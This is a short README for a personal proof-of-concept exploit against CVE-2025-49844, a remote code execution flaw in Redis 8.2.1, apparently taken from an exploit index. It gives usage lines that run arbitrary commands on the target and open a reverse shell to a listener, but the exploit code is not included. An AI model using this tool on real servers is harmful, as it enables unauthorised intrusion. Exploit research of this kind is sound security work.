Share
## https://sploitus.com/exploit?id=3F631900-2A5D-57E4-9457-F169D3FCCD9F
# CVE-2025-49844

My personal proof-of-concept for [CVE-2025-49844], also known as [RediShell].

Specifically targets the x86-64 Linux build present in the `redis:8.2.1` Docker image.

It's a bit clumsy, probably not as good as Wiz Research's. Still, I'm glad I managed to get it working before the Hexacon 2025 talks are uploaded, and I had great time investigating it.

## Usage

Run one-way shell commands:
```sh
$ uv run main.py command "echo 'hello world' > /data/hello.txt"
```

Connect to a reverse shell:
```sh
$ uv run main.py rshell -l 127.0.0.1 -p 4444
```

[CVE-2025-49844]:https://nvd.nist.gov/vuln/detail/CVE-2025-49844
[RediShell]:https://www.wiz.io/blog/wiz-research-redis-rce-cve-2025-49844